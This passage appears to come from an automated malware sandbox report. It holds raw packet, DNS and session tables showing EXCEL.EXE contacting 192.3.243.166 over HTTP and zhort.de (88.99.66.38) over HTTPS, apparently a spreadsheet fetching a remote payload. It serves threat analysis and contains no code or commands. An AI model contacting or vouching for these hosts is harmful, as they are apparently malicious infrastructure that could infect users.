                                                        Aug 28, 2024 07:01:27.274565935 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.274579048 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.274590015 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.274601936 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.274633884 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.274633884 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.274702072 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321305037 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321324110 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321341991 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321356058 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321367979 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321378946 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321388960 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321388960 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321392059 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321419001 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321419001 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321419001 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321496010 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321506977 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321517944 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321530104 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321536064 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321536064 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321542025 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321552992 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321582079 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321582079 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321594000 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321711063 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321774960 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321787119 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321798086 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321809053 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321820974 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321824074 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321824074 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321831942 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321846008 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321846008 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321858883 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321863890 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321863890 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321873903 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321887016 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321897030 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321903944 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321903944 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321909904 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321921110 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321932077 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321953058 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.321959019 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321959019 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.321973085 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322000980 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322007895 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322021008 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322032928 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322035074 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322035074 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322045088 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322058916 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322058916 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322073936 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322118998 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322132111 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322143078 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322155952 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322156906 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322156906 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322182894 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322191000 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322271109 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322282076 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322293997 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322312117 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322324038 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322324991 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322335958 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322335958 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322350025 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322360992 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322374105 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322379112 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322379112 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322395086 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322407007 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322593927 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322607040 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322617054 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322629929 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322640896 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322652102 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322659969 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322659969 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322664022 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322675943 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322691917 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322693110 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322693110 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322702885 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322714090 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322726965 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322726965 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322747946 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322747946 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322845936 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322858095 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322866917 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.322900057 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.322900057 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326245070 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326320887 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326328993 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326333046 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326344967 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326358080 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326380968 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326380968 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326394081 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326448917 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326461077 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326472044 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326483011 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326488972 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326494932 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326509953 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326509953 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326525927 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326536894 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326549053 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326549053 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326556921 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326586962 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326590061 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326627016 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326627016 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326654911 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326672077 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326683998 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326690912 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326694965 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326704025 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326713085 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.326716900 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326726913 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.326773882 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.336920023 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.336941004 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.336952925 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.336990118 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.336990118 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337017059 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337029934 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337039948 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337057114 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337073088 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337116957 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337127924 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337140083 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337151051 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337162971 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337163925 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337173939 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337189913 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337189913 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337219000 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337239027 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337251902 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337275028 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337279081 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337285042 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337297916 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337311983 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337341070 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337376118 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337393045 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337404013 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337415934 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337430000 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337430000 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337446928 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337506056 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337517977 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337527990 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337539911 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337551117 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337554932 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337554932 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337574959 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337580919 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337624073 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337637901 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337649107 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337666035 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.337675095 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337692022 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.337697983 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.360697031 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.360709906 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.360719919 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.360753059 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.360754013 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.360791922 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.360810041 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.360821962 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.360833883 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.360846043 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.360857964 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.360882998 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408068895 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408163071 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408174038 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408183098 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408184052 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408205032 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408207893 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408225060 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408237934 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408241034 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408241034 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408248901 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408268929 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408274889 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408274889 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408279896 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408289909 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408292055 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408303976 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408310890 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408310890 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408319950 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408330917 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408335924 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408335924 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408344984 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408356905 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408370972 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408410072 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408477068 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408519983 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408528090 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408533096 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408555984 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408571005 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408571005 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408596992 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408601046 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408607006 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408613920 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408673048 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:27.408821106 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408832073 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:27.408886909 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:31.788625002 CEST8049165192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:31.788695097 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:32.362107038 CEST4916580192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:37.404411077 CEST49166443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:37.404464960 CEST4434916688.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:37.404521942 CEST49166443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:37.407808065 CEST49166443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:37.407824993 CEST4434916688.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:38.066637039 CEST4434916688.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:38.066798925 CEST49166443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:38.068250895 CEST49166443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:38.068259954 CEST4434916688.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:38.073165894 CEST49166443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:38.073172092 CEST4434916688.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:38.367818117 CEST4434916688.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:38.367894888 CEST4434916688.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:38.367979050 CEST49166443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:38.368395090 CEST49166443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:38.368395090 CEST49166443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:38.729967117 CEST49166443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:38.730007887 CEST4434916688.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:39.570703030 CEST4916780192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:39.711843967 CEST8049167192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:39.712132931 CEST4916780192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:40.073772907 CEST49168443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:40.073873997 CEST4434916888.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:40.073951960 CEST49168443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:40.084702015 CEST49168443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:40.084753990 CEST4434916888.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:40.765364885 CEST4434916888.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:40.765537977 CEST49168443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:40.770402908 CEST49168443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:40.770437002 CEST4434916888.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:40.770828009 CEST4434916888.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:40.770880938 CEST49168443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:40.832257986 CEST49168443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:40.872514009 CEST4434916888.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:41.066329002 CEST4434916888.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:41.066400051 CEST4434916888.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:41.066442013 CEST49168443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:41.066458941 CEST49168443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:41.202183008 CEST49168443192.168.2.2288.99.66.38
                                                        Aug 28, 2024 07:01:41.202250957 CEST4434916888.99.66.38192.168.2.22
                                                        Aug 28, 2024 07:01:41.204150915 CEST4916780192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:41.204590082 CEST4916980192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:41.209408998 CEST8049169192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:41.209433079 CEST8049167192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:41.209472895 CEST4916980192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:41.209506035 CEST4916780192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:41.209705114 CEST4916980192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:41.214456081 CEST8049169192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:41.779788971 CEST8049169192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:41.779865980 CEST4916980192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:46.788243055 CEST8049169192.3.243.166192.168.2.22
                                                        Aug 28, 2024 07:01:46.788305044 CEST4916980192.168.2.22192.3.243.166
                                                        Aug 28, 2024 07:01:47.075220108 CEST4916980192.168.2.22192.3.243.166
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Aug 28, 2024 07:01:15.445471048 CEST5456253192.168.2.228.8.8.8
                                                        Aug 28, 2024 07:01:15.455929041 CEST53545628.8.8.8192.168.2.22
                                                        Aug 28, 2024 07:01:18.278170109 CEST5291753192.168.2.228.8.8.8
                                                        Aug 28, 2024 07:01:18.288204908 CEST53529178.8.8.8192.168.2.22
                                                        Aug 28, 2024 07:01:40.021681070 CEST6275153192.168.2.228.8.8.8
                                                        Aug 28, 2024 07:01:40.028654099 CEST53627518.8.8.8192.168.2.22
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Aug 28, 2024 07:01:15.445471048 CEST192.168.2.228.8.8.80x2237Standard query (0)zhort.deA (IP address)IN (0x0001)false
                                                        Aug 28, 2024 07:01:18.278170109 CEST192.168.2.228.8.8.80x5153Standard query (0)zhort.deA (IP address)IN (0x0001)false
                                                        Aug 28, 2024 07:01:40.021681070 CEST192.168.2.228.8.8.80xb4a4Standard query (0)zhort.deA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Aug 28, 2024 07:01:15.455929041 CEST8.8.8.8192.168.2.220x2237No error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                        Aug 28, 2024 07:01:18.288204908 CEST8.8.8.8192.168.2.220x5153No error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                        Aug 28, 2024 07:01:40.028654099 CEST8.8.8.8192.168.2.220xb4a4No error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                        • zhort.de
                                                        • 192.3.243.166
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.2249162192.3.243.166803492C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        TimestampBytes transferredDirectionData
